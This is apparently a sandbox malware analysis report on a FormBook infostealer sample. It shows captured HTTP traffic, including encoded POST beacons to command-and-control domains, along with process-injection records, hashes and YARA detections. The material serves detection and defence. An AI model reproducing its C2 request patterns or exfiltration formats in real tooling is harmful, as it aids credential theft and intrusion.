Jun 8, 2024 18:18:06.567523956 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:18:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 [TRUNCATED] Data Ascii: 2927<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.b301.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" re [TRUNCATED]
Jun 8, 2024 18:18:06.567581892 CEST	1236	IN	Data Raw: 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 Data Ascii: class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.b301.space</h1><p class="b-parking__header-descrip
Jun 8, 2024 18:18:06.567625999 CEST	1236	IN	Data Raw: d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div c
Jun 8, 2024 18:18:06.567660093 CEST	1236	IN	Data Raw: 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 Data Ascii: -parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.b
Jun 8, 2024 18:18:06.567702055 CEST	1236	IN	Data Raw: 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f Data Ascii: rver&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">  CMS</strong><p class="b-te
Jun 8, 2024 18:18:06.567735910 CEST	1236	IN	Data Raw: 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 20 62 2d 62 75 74 74 6f 6e 5f 74 65 Data Ascii: tton_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_build&reg_source=parking
Jun 8, 2024 18:18:06.567770958 CEST	1236	IN	Data Raw: 6e 62 73 70 3b d0 b7 d0 bb d0 be d1 83 d0 bc d1 8b d1 88 d0 bb d0 b5 d0 bd d0 bd d0 b8 d0 ba d0 be d0 b2 21 20 d0 9a d1 80 d0 be d0 bc d0 b5 20 d1 82 d0 be d0 b3 d0 be 2c 20 d0 b2 d1 8b 26 6e 62 73 70 3b d0 bf d0 be d0 b2 d1 8b d1 81 d0 b8 d1 82 Data Ascii: nbsp;! ,       SEO-.</p></div></
Jun 8, 2024 18:18:06.567804098 CEST	1236	IN	Data Raw: 61 69 6e 5f 64 61 74 61 3f 64 6f 6d 61 69 6e 5f 6e 61 6d 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 72 61 6e 64 3d 27 20 2b 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2b 20 27 26 63 61 6c 6c 62 61 63 6b 3d 6f 6e 64 61 74 61 27 3b 0a 20 Data Ascii: ain_data?domain_name=www.b301.space&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.b301.space'.match( /xn--/ ) && document.querySelectorAll ) { var s
Jun 8, 2024 18:18:06.567843914 CEST	810	IN	Data Raw: 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a Data Ascii: indow.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]\|\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49787	154.215.72.110	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:14.918565989 CEST	498	OUT	GET /fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:18:15.903482914 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:18:15 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49788	202.172.28.202	80

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:21.563852072 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6b 32 76 35 52 35 2f 76 72 4d 41 46 48 55 74 46 78 65 6f 65 77 36 43 2b 6b 42 51 62 2f 41 4c 52 41 3d 3d Data Ascii: aZ=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffk2v5R5/vrMAFHUtFxeoew6C+kBQb/ALRA==
Jun 8, 2024 18:18:22.729505062 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:18:22 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49789	202.172.28.202	80

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:24.094155073 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 65 78 6a 6a 49 6b 57 38 39 43 4b 4d 5a 66 4e 68 42 64 6f 35 63 66 67 68 47 53 52 76 49 54 58 39 30 3d Data Ascii: aZ=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwexjjIkW89CKMZfNhBdo5cfghGSRvITX90=
Jun 8, 2024 18:18:24.980746031 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:18:24 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49790	202.172.28.202	80

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:26.628149986 CEST	10878	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 45 76 61 66 47 4f 43 31 45 6b 56 61 66 56 31 48 2b 49 6b 4b 6a 68 5a 72 59 41 53 6f 78 58 6e 57 4e 73 70 4e 62 64 62 47 57 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4c 6a 49 79 41 39 63 5a 55 6e 30 69 63 4e 4b 39 46 70 65 44 4d 2f 58 63 41 66 31 7a 55 6b 4b 6c 74 53 33 51 39 4f 77 63 50 73 51 2b 4b 64 72 2b 43 67 79 56 64 4e 6f 34 7a 61 34 53 77 2f 51 48 50 47 47 66 41 6a 77 2b 59 35 35 64 76 4e 74 43 32 59 53 4e [TRUNCATED] Data Ascii: aZ=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFEvafGOC1EkVafV1H+IkKjhZrYASoxXnWNspNbdbGWN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFLjIyA9cZUn0icNK9FpeDM/XcAf1zUkKltS3Q9OwcPsQ+Kdr+CgyVdNo4za4Sw/QHPGGfAjw+Y55dvNtC2YSNKuic7DQ4iT10QiVGqckJQbm6DPegwCtQhh4WulBqAacvsxY0a25Y9+zKUG42yNoXu4ju9sCZFNk1lo0dI6YGfF7/7H3q5adljciPwCW0kX3jvCkD4q9ZyRURKthdoV+r6cFVopM4tjtEZ01s/uaCQjzX3CGhw9Z/EwzaXMbjVj3kmand6EKtPtlotVVt88vpW9UKsTvFUbX5N1nmx7t4/a3VvYweWor/WOi06Rk679nfIQyaqy0YvK1wXWY/o6AHs0Qnp7/8xH78mkUla2F0anUuagmvBhC77HuZSxJuhrC/HRg+eEaW9YUQfnRKXqbpcapSDPQSeUMG8Lv8mJc+p9Ia4Ckiv8hFCwjXNrYvmc9IryWuOR/a9h+FqGAtlXV/VoH5eEIUyA0EMOWB9H39laXgFTtbkjBSNff+dSlM/eSBogxiJlRoo1pfQwArK1QHPu5cB0fcPAq6xDOsbIFlvTHPx0/lYNGF5QkZc2aEpzKwBA3FZ8bMwpfNq9gcj7IP2zYKFJAn8e6fw6J0/+SJ12DfczYIn+71Nl2vvePwPNSGlvEeoGhUEXf3D7NbEDvJJ/Q3ydB1Ham2F/YxVmD0vBYS9xfXRQZlJQ/s4WtM6ws4fVszi6kwVQiwWo5oAyOzZhAjdjlX6dmvvac3JAF8pv759C6QHOhkvd [TRUNCATED]
Jun 8, 2024 18:18:27.496239901 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:18:27 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Target ID:	0
Start time:	12:14:12
Start date:	08/06/2024
Path:	C:\Users\user\Desktop\N2sgk6jMa2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\N2sgk6jMa2.exe"
Imagebase:	0xd00000
File size:	1'226'752 bytes
MD5 hash:	B94B6C27E410388CD4E7DFEB352B75CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:14:13
Start date:	08/06/2024
Path:	C:\Users\user\AppData\Local\directory\.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\N2sgk6jMa2.exe"
Imagebase:	0xb30000
File size:	1'226'752 bytes
MD5 hash:	B94B6C27E410388CD4E7DFEB352B75CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:14:13
Start date:	08/06/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\N2sgk6jMa2.exe"
Imagebase:	0xb60000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:14:20
Start date:	08/06/2024
Path:	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe"
Imagebase:	0x110000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:14:22
Start date:	08/06/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xe20000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:14:34
Start date:	08/06/2024
Path:	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe"
Imagebase:	0x110000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
